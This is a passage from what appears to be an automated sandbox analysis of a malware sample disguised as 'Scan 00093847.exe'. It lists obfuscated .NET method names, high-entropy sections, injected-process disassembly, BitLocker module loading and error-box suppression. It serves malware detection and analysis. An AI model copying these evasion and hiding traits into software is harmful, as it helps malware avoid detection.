            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_04322A0D push esi; ret 8_2_04322A0E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432029D push eax; iretd 8_2_0432029E
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_043303FA push ebp; ret 8_2_043303FB
            Source: C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exeCode function: 8_2_0432FBFF push ds; ret 8_2_0432FC01
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03B809AD push ecx; mov dword ptr [esp], ecx9_2_03B809B6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C36D push edx; iretd 9_2_0326C36E
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032703BE push ebp; iretd 9_2_032703CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032703F2 push ss; iretd 9_2_032703F6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032673C9 push 00000063h; retf 9_2_032673CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03255170 push eax; iretd 9_2_03255171
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03267594 push DD2CA9E8h; retf 9_2_0326759A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03270400 push ds; retf 9_2_03270403
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032624EA push ebx; retf 9_2_032624EB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03264AD2 push ds; ret 9_2_03264AD4
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326D8B8 push edi; iretd 9_2_0326D8BA
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_032578E0 push esi; ret 9_2_032578E1
            Source: Scan 00093847.exeStatic PE information: section name: .text entropy: 7.912332332178285
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, x75rPZrJVaknhWeD2F.csHigh entropy of concatenated method names: 'xOjY5FSPhe', 'OThYD7m6xG', 'hHpr1jHCcu', 'qh8raHPrUd', 'FlTr7uFcyu', 'g5DrXSx16S', 'CpCrAFCPoJ', 'dVNrxvZ8mZ', 'po8rFwGYnY', 'CeWrKgdpuA'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, EWps5XsJN6X79AaxK1.csHigh entropy of concatenated method names: 'Dispose', 'm3lsB8oD1f', 'VKjhGkRfNJ', 'kxRNNCqu2y', 'Cu8spyHhCb', 'zTGszUMnAm', 'ProcessDialogKey', 'gwBhwZiCiA', 'SO5hsULl3r', 'DJVhhPTZBB'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, CDQdkfwKkBl51cZ9q9b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbBoQFb7jV', 'ilXobt0egf', 'wlxom3PSIV', 'WFeofGuoVF', 'Y3TotH35bH', 'bWSonVLL0k', 'dZTo0SRXHv'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, yCd6TKQ6QdRmG1No7E.csHigh entropy of concatenated method names: 'zkeuQo84Ky', 'a39ublOT0e', 'B3rumw1uk8', 'M02ufdRFx3', 'dS3utxIrVs', 'VKNunQVnQK', 'Buqu0gXjht', 'uw0uHyByfC', 'iO5uB72xdG', 'stRuprnl2n'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, xbnwQMEvInGHMtrNdY.csHigh entropy of concatenated method names: 'wWf9qGdywV', 'bxi9u3n8xh', 'fV99rrUlso', 'C2w9YSuC59', 'YPi9vudI16', 'D549Cn98vJ', 'uc99OaWpuZ', 'T7s98eVuR3', 'utv9dZElmo', 'Cky9U4eai4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, fq78X2c3Qq0OHQr1qO.csHigh entropy of concatenated method names: 'pc8rE7n6K6', 'DyprjmE0r7', 'JXkrcs4jop', 'Gofr2lSusM', 'ba0rga8IEe', 'qxWryj0wVy', 'AIWrRXjCs6', 'dAor9dsJ6a', 'x4srItvVCG', 'wJAro8Pkj4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, IdwSeWBNwmgh8U2Fju.csHigh entropy of concatenated method names: 'cJMic5aXUS', 'bpDi2bYSQI', 'KFwiTycZOO', 'THJiGei2a7', 'w3hiaui62g', 'J3Ki7Kyutf', 'SbliAMSlb7', 'iNbix141MU', 'V4AiKPyWJZ', 'kRQiWIlvNW'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, BwIRkvPKU89DxkYm9a.csHigh entropy of concatenated method names: 'wbAIsDvZV4', 'bwtILrVKts', 'c4GIZj7xjq', 'JEYIqZjBsm', 'HXDIu30Wvr', 'bZAIYBZJH3', 'cWeIvrZJj8', 'sjt90TeDlZ', 'kaU9HuWHk4', 'lC39BlLbR4'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, XhAFAamr0tWlcVBdxt.csHigh entropy of concatenated method names: 'VcQRdGHvD1', 'DbRRUWRSoQ', 'ToString', 'frnRqUGaUs', 'kRNRuo2LB3', 'd0LRrX1xKY', 'uLXRYTCdBZ', 'HQoRvadIgD', 'PGZRCIZq4j', 'H4vROdYylA'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, S8ZbYw8Fi1k4FC25jC.csHigh entropy of concatenated method names: 'XPY9TmUhEd', 'L0m9GhqlRq', 'iVX91CxUDR', 'ofY9a24UuH', 'bsI9QCwVc0', 'Hi797FZCRE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TyYPmlqpDhfKEJ8WuW.csHigh entropy of concatenated method names: 'a8SgKomQjU', 'F1Mg6JmZ3x', 'RF5gQhUb3u', 'l68gb6HL5F', 'C2YgGFKURw', 'SUvg1jObVb', 'I4OgaJ4UpO', 'UMfg7DgATs', 'K65gXUnDQ2', 'NeagA4Aq6j'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, XOj1J7zjRbZLE3UVuq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLxIiEkFhk', 'I2OIg9N2Hu', 'fZ8Iycb9nl', 'lYxIRbSOVt', 'PHOI9dMbLx', 'usUIIWWxft', 'K6bIoxgoxL'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, QWn8omgnahOufuxoIN.csHigh entropy of concatenated method names: 'a4ARHsa7td', 'Fo4RpfwGx5', 'Kbc9wYdqMx', 'j8y9slWNUW', 'yvSRWaUUyI', 'bbQR6euLEI', 'iJYRVWaMrb', 'P7lRQ8bvFS', 'K9WRbDaOiy', 'U0oRm9VEZT'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, w77h6TwuZ18DcKUfpl4.csHigh entropy of concatenated method names: 'yLGIMj7Tql', 'sVyIlMmLF4', 'YbjI3RhnyH', 'KDHIEcYuIP', 'eB8I5BK66y', 'V5eIjbRScD', 'OWGIDqrJle', 'IoqIcruFq4', 'qsPI2MmHNh', 'gd7IeD1NCK'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, QVRjQq3x3ioEZ2IDHG.csHigh entropy of concatenated method names: 'gussC7Ehrw', 'gwgsOLD5RN', 'wPUsdUoAZl', 'ILXsUZs0TR', 'zAxsgMFQXZ', 'dKnsyos8hM', 'b73DiPj7YM6evr0GXf', 'XlpO0T4IpPtiFEMR7L', 'zVyssZKZ2p', 'U3esLReS9C'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, UkQjbuFFqg3jhaMZxt.csHigh entropy of concatenated method names: 'LS9vShhXtV', 'iuPvupag19', 'pESvYBmGed', 'WoBvCJmwIt', 'SRqvOiiLeH', 'lJEYtCTfoe', 'yLPYn4m6NC', 'HIoY0C7cUW', 'nWgYHPyFHp', 'bwSYBkO5Um'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, TnkgYbd3tme2aO7aiW.csHigh entropy of concatenated method names: 'r34LS847gO', 'H2KLqXqK00', 'i6iLu3VTtW', 'aKtLrJjXTP', 'lDILYxTgr4', 'kQMLvlFxdy', 'rJPLCq64eu', 'IUJLOMi47n', 'q0BL8wvpTa', 'oMHLdKMJx6'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, YgRgb5I2oAelbEfpAx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B0lhBTgWPt', 'SMlhpe0byO', 'aM0hzQmIJW', 'wFTLw46qpH', 'UifLslESh4', 'QBDLhOGcAD', 'wnaLLVWSh3', 'loMXDGehAaUByGpjkV2'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, DvMJcLbtywNmiZ3ATB.csHigh entropy of concatenated method names: 'GAk3TEXQv', 'oYIElZifm', 'fQYjfjAqH', 'BwEDBy53P', 'eY32k2vVd', 'T8neGCB0N', 'pJ71vlXd2FcSTLj0nR', 'Ednosq9eterdcCvKME', 'A8H9uF94O', 'm4coaCHpS'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, q52Od2n9oSNdoIQjeK.csHigh entropy of concatenated method names: 'EWDCq91ujJ', 'aLYCrV8MVM', 'qPXCvscdjC', 'GXwvpeRXFa', 'bIPvzv4MsC', 'AYrCwmPGNy', 'eygCsixsW6', 'CFSCheNCmm', 'zW1CLsxOMn', 'cGLCZBl48S'
            Source: 0.2.Scan 00093847.exe.42600b0.2.raw.unpack, Q1i50DNGqTQOwewitq.csHigh entropy of concatenated method names: 'b5VCM6vpcY', 'q7VClhpaHt', 'aYMC36co4y', 'HErCEU5gXh', 'h4mC5hrQKJ', 'RTwCjuKoYT', 'H0PCDfnDux', 'yyWCcoBKHu', 'OH1C2v9YcQ', 'I0GCeqYeXi'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, x75rPZrJVaknhWeD2F.csHigh entropy of concatenated method names: 'xOjY5FSPhe', 'OThYD7m6xG', 'hHpr1jHCcu', 'qh8raHPrUd', 'FlTr7uFcyu', 'g5DrXSx16S', 'CpCrAFCPoJ', 'dVNrxvZ8mZ', 'po8rFwGYnY', 'CeWrKgdpuA'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, EWps5XsJN6X79AaxK1.csHigh entropy of concatenated method names: 'Dispose', 'm3lsB8oD1f', 'VKjhGkRfNJ', 'kxRNNCqu2y', 'Cu8spyHhCb', 'zTGszUMnAm', 'ProcessDialogKey', 'gwBhwZiCiA', 'SO5hsULl3r', 'DJVhhPTZBB'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, CDQdkfwKkBl51cZ9q9b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbBoQFb7jV', 'ilXobt0egf', 'wlxom3PSIV', 'WFeofGuoVF', 'Y3TotH35bH', 'bWSonVLL0k', 'dZTo0SRXHv'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, yCd6TKQ6QdRmG1No7E.csHigh entropy of concatenated method names: 'zkeuQo84Ky', 'a39ublOT0e', 'B3rumw1uk8', 'M02ufdRFx3', 'dS3utxIrVs', 'VKNunQVnQK', 'Buqu0gXjht', 'uw0uHyByfC', 'iO5uB72xdG', 'stRuprnl2n'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, xbnwQMEvInGHMtrNdY.csHigh entropy of concatenated method names: 'wWf9qGdywV', 'bxi9u3n8xh', 'fV99rrUlso', 'C2w9YSuC59', 'YPi9vudI16', 'D549Cn98vJ', 'uc99OaWpuZ', 'T7s98eVuR3', 'utv9dZElmo', 'Cky9U4eai4'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, fq78X2c3Qq0OHQr1qO.csHigh entropy of concatenated method names: 'pc8rE7n6K6', 'DyprjmE0r7', 'JXkrcs4jop', 'Gofr2lSusM', 'ba0rga8IEe', 'qxWryj0wVy', 'AIWrRXjCs6', 'dAor9dsJ6a', 'x4srItvVCG', 'wJAro8Pkj4'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, IdwSeWBNwmgh8U2Fju.csHigh entropy of concatenated method names: 'cJMic5aXUS', 'bpDi2bYSQI', 'KFwiTycZOO', 'THJiGei2a7', 'w3hiaui62g', 'J3Ki7Kyutf', 'SbliAMSlb7', 'iNbix141MU', 'V4AiKPyWJZ', 'kRQiWIlvNW'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, BwIRkvPKU89DxkYm9a.csHigh entropy of concatenated method names: 'wbAIsDvZV4', 'bwtILrVKts', 'c4GIZj7xjq', 'JEYIqZjBsm', 'HXDIu30Wvr', 'bZAIYBZJH3', 'cWeIvrZJj8', 'sjt90TeDlZ', 'kaU9HuWHk4', 'lC39BlLbR4'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, XhAFAamr0tWlcVBdxt.csHigh entropy of concatenated method names: 'VcQRdGHvD1', 'DbRRUWRSoQ', 'ToString', 'frnRqUGaUs', 'kRNRuo2LB3', 'd0LRrX1xKY', 'uLXRYTCdBZ', 'HQoRvadIgD', 'PGZRCIZq4j', 'H4vROdYylA'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, S8ZbYw8Fi1k4FC25jC.csHigh entropy of concatenated method names: 'XPY9TmUhEd', 'L0m9GhqlRq', 'iVX91CxUDR', 'ofY9a24UuH', 'bsI9QCwVc0', 'Hi797FZCRE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TyYPmlqpDhfKEJ8WuW.csHigh entropy of concatenated method names: 'a8SgKomQjU', 'F1Mg6JmZ3x', 'RF5gQhUb3u', 'l68gb6HL5F', 'C2YgGFKURw', 'SUvg1jObVb', 'I4OgaJ4UpO', 'UMfg7DgATs', 'K65gXUnDQ2', 'NeagA4Aq6j'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, XOj1J7zjRbZLE3UVuq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLxIiEkFhk', 'I2OIg9N2Hu', 'fZ8Iycb9nl', 'lYxIRbSOVt', 'PHOI9dMbLx', 'usUIIWWxft', 'K6bIoxgoxL'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, QWn8omgnahOufuxoIN.csHigh entropy of concatenated method names: 'a4ARHsa7td', 'Fo4RpfwGx5', 'Kbc9wYdqMx', 'j8y9slWNUW', 'yvSRWaUUyI', 'bbQR6euLEI', 'iJYRVWaMrb', 'P7lRQ8bvFS', 'K9WRbDaOiy', 'U0oRm9VEZT'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, w77h6TwuZ18DcKUfpl4.csHigh entropy of concatenated method names: 'yLGIMj7Tql', 'sVyIlMmLF4', 'YbjI3RhnyH', 'KDHIEcYuIP', 'eB8I5BK66y', 'V5eIjbRScD', 'OWGIDqrJle', 'IoqIcruFq4', 'qsPI2MmHNh', 'gd7IeD1NCK'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, QVRjQq3x3ioEZ2IDHG.csHigh entropy of concatenated method names: 'gussC7Ehrw', 'gwgsOLD5RN', 'wPUsdUoAZl', 'ILXsUZs0TR', 'zAxsgMFQXZ', 'dKnsyos8hM', 'b73DiPj7YM6evr0GXf', 'XlpO0T4IpPtiFEMR7L', 'zVyssZKZ2p', 'U3esLReS9C'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, UkQjbuFFqg3jhaMZxt.csHigh entropy of concatenated method names: 'LS9vShhXtV', 'iuPvupag19', 'pESvYBmGed', 'WoBvCJmwIt', 'SRqvOiiLeH', 'lJEYtCTfoe', 'yLPYn4m6NC', 'HIoY0C7cUW', 'nWgYHPyFHp', 'bwSYBkO5Um'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, TnkgYbd3tme2aO7aiW.csHigh entropy of concatenated method names: 'r34LS847gO', 'H2KLqXqK00', 'i6iLu3VTtW', 'aKtLrJjXTP', 'lDILYxTgr4', 'kQMLvlFxdy', 'rJPLCq64eu', 'IUJLOMi47n', 'q0BL8wvpTa', 'oMHLdKMJx6'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, YgRgb5I2oAelbEfpAx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B0lhBTgWPt', 'SMlhpe0byO', 'aM0hzQmIJW', 'wFTLw46qpH', 'UifLslESh4', 'QBDLhOGcAD', 'wnaLLVWSh3', 'loMXDGehAaUByGpjkV2'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, DvMJcLbtywNmiZ3ATB.csHigh entropy of concatenated method names: 'GAk3TEXQv', 'oYIElZifm', 'fQYjfjAqH', 'BwEDBy53P', 'eY32k2vVd', 'T8neGCB0N', 'pJ71vlXd2FcSTLj0nR', 'Ednosq9eterdcCvKME', 'A8H9uF94O', 'm4coaCHpS'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, q52Od2n9oSNdoIQjeK.csHigh entropy of concatenated method names: 'EWDCq91ujJ', 'aLYCrV8MVM', 'qPXCvscdjC', 'GXwvpeRXFa', 'bIPvzv4MsC', 'AYrCwmPGNy', 'eygCsixsW6', 'CFSCheNCmm', 'zW1CLsxOMn', 'cGLCZBl48S'
            Source: 0.2.Scan 00093847.exe.7f70000.4.raw.unpack, Q1i50DNGqTQOwewitq.csHigh entropy of concatenated method names: 'b5VCM6vpcY', 'q7VClhpaHt', 'aYMC36co4y', 'HErCEU5gXh', 'h4mC5hrQKJ', 'RTwCjuKoYT', 'H0PCDfnDux', 'yyWCcoBKHu', 'OH1C2v9YcQ', 'I0GCeqYeXi'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, x75rPZrJVaknhWeD2F.csHigh entropy of concatenated method names: 'xOjY5FSPhe', 'OThYD7m6xG', 'hHpr1jHCcu', 'qh8raHPrUd', 'FlTr7uFcyu', 'g5DrXSx16S', 'CpCrAFCPoJ', 'dVNrxvZ8mZ', 'po8rFwGYnY', 'CeWrKgdpuA'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, EWps5XsJN6X79AaxK1.csHigh entropy of concatenated method names: 'Dispose', 'm3lsB8oD1f', 'VKjhGkRfNJ', 'kxRNNCqu2y', 'Cu8spyHhCb', 'zTGszUMnAm', 'ProcessDialogKey', 'gwBhwZiCiA', 'SO5hsULl3r', 'DJVhhPTZBB'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, CDQdkfwKkBl51cZ9q9b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbBoQFb7jV', 'ilXobt0egf', 'wlxom3PSIV', 'WFeofGuoVF', 'Y3TotH35bH', 'bWSonVLL0k', 'dZTo0SRXHv'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, yCd6TKQ6QdRmG1No7E.csHigh entropy of concatenated method names: 'zkeuQo84Ky', 'a39ublOT0e', 'B3rumw1uk8', 'M02ufdRFx3', 'dS3utxIrVs', 'VKNunQVnQK', 'Buqu0gXjht', 'uw0uHyByfC', 'iO5uB72xdG', 'stRuprnl2n'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, xbnwQMEvInGHMtrNdY.csHigh entropy of concatenated method names: 'wWf9qGdywV', 'bxi9u3n8xh', 'fV99rrUlso', 'C2w9YSuC59', 'YPi9vudI16', 'D549Cn98vJ', 'uc99OaWpuZ', 'T7s98eVuR3', 'utv9dZElmo', 'Cky9U4eai4'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, fq78X2c3Qq0OHQr1qO.csHigh entropy of concatenated method names: 'pc8rE7n6K6', 'DyprjmE0r7', 'JXkrcs4jop', 'Gofr2lSusM', 'ba0rga8IEe', 'qxWryj0wVy', 'AIWrRXjCs6', 'dAor9dsJ6a', 'x4srItvVCG', 'wJAro8Pkj4'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, IdwSeWBNwmgh8U2Fju.csHigh entropy of concatenated method names: 'cJMic5aXUS', 'bpDi2bYSQI', 'KFwiTycZOO', 'THJiGei2a7', 'w3hiaui62g', 'J3Ki7Kyutf', 'SbliAMSlb7', 'iNbix141MU', 'V4AiKPyWJZ', 'kRQiWIlvNW'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, BwIRkvPKU89DxkYm9a.csHigh entropy of concatenated method names: 'wbAIsDvZV4', 'bwtILrVKts', 'c4GIZj7xjq', 'JEYIqZjBsm', 'HXDIu30Wvr', 'bZAIYBZJH3', 'cWeIvrZJj8', 'sjt90TeDlZ', 'kaU9HuWHk4', 'lC39BlLbR4'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, XhAFAamr0tWlcVBdxt.csHigh entropy of concatenated method names: 'VcQRdGHvD1', 'DbRRUWRSoQ', 'ToString', 'frnRqUGaUs', 'kRNRuo2LB3', 'd0LRrX1xKY', 'uLXRYTCdBZ', 'HQoRvadIgD', 'PGZRCIZq4j', 'H4vROdYylA'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, S8ZbYw8Fi1k4FC25jC.csHigh entropy of concatenated method names: 'XPY9TmUhEd', 'L0m9GhqlRq', 'iVX91CxUDR', 'ofY9a24UuH', 'bsI9QCwVc0', 'Hi797FZCRE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TyYPmlqpDhfKEJ8WuW.csHigh entropy of concatenated method names: 'a8SgKomQjU', 'F1Mg6JmZ3x', 'RF5gQhUb3u', 'l68gb6HL5F', 'C2YgGFKURw', 'SUvg1jObVb', 'I4OgaJ4UpO', 'UMfg7DgATs', 'K65gXUnDQ2', 'NeagA4Aq6j'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, XOj1J7zjRbZLE3UVuq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wLxIiEkFhk', 'I2OIg9N2Hu', 'fZ8Iycb9nl', 'lYxIRbSOVt', 'PHOI9dMbLx', 'usUIIWWxft', 'K6bIoxgoxL'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, QWn8omgnahOufuxoIN.csHigh entropy of concatenated method names: 'a4ARHsa7td', 'Fo4RpfwGx5', 'Kbc9wYdqMx', 'j8y9slWNUW', 'yvSRWaUUyI', 'bbQR6euLEI', 'iJYRVWaMrb', 'P7lRQ8bvFS', 'K9WRbDaOiy', 'U0oRm9VEZT'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, w77h6TwuZ18DcKUfpl4.csHigh entropy of concatenated method names: 'yLGIMj7Tql', 'sVyIlMmLF4', 'YbjI3RhnyH', 'KDHIEcYuIP', 'eB8I5BK66y', 'V5eIjbRScD', 'OWGIDqrJle', 'IoqIcruFq4', 'qsPI2MmHNh', 'gd7IeD1NCK'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, QVRjQq3x3ioEZ2IDHG.csHigh entropy of concatenated method names: 'gussC7Ehrw', 'gwgsOLD5RN', 'wPUsdUoAZl', 'ILXsUZs0TR', 'zAxsgMFQXZ', 'dKnsyos8hM', 'b73DiPj7YM6evr0GXf', 'XlpO0T4IpPtiFEMR7L', 'zVyssZKZ2p', 'U3esLReS9C'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, UkQjbuFFqg3jhaMZxt.csHigh entropy of concatenated method names: 'LS9vShhXtV', 'iuPvupag19', 'pESvYBmGed', 'WoBvCJmwIt', 'SRqvOiiLeH', 'lJEYtCTfoe', 'yLPYn4m6NC', 'HIoY0C7cUW', 'nWgYHPyFHp', 'bwSYBkO5Um'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, TnkgYbd3tme2aO7aiW.csHigh entropy of concatenated method names: 'r34LS847gO', 'H2KLqXqK00', 'i6iLu3VTtW', 'aKtLrJjXTP', 'lDILYxTgr4', 'kQMLvlFxdy', 'rJPLCq64eu', 'IUJLOMi47n', 'q0BL8wvpTa', 'oMHLdKMJx6'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, YgRgb5I2oAelbEfpAx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'B0lhBTgWPt', 'SMlhpe0byO', 'aM0hzQmIJW', 'wFTLw46qpH', 'UifLslESh4', 'QBDLhOGcAD', 'wnaLLVWSh3', 'loMXDGehAaUByGpjkV2'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, DvMJcLbtywNmiZ3ATB.csHigh entropy of concatenated method names: 'GAk3TEXQv', 'oYIElZifm', 'fQYjfjAqH', 'BwEDBy53P', 'eY32k2vVd', 'T8neGCB0N', 'pJ71vlXd2FcSTLj0nR', 'Ednosq9eterdcCvKME', 'A8H9uF94O', 'm4coaCHpS'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, q52Od2n9oSNdoIQjeK.csHigh entropy of concatenated method names: 'EWDCq91ujJ', 'aLYCrV8MVM', 'qPXCvscdjC', 'GXwvpeRXFa', 'bIPvzv4MsC', 'AYrCwmPGNy', 'eygCsixsW6', 'CFSCheNCmm', 'zW1CLsxOMn', 'cGLCZBl48S'
            Source: 0.2.Scan 00093847.exe.42e82d0.1.raw.unpack, Q1i50DNGqTQOwewitq.csHigh entropy of concatenated method names: 'b5VCM6vpcY', 'q7VClhpaHt', 'aYMC36co4y', 'HErCEU5gXh', 'h4mC5hrQKJ', 'RTwCjuKoYT', 'H0PCDfnDux', 'yyWCcoBKHu', 'OH1C2v9YcQ', 'I0GCeqYeXi'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
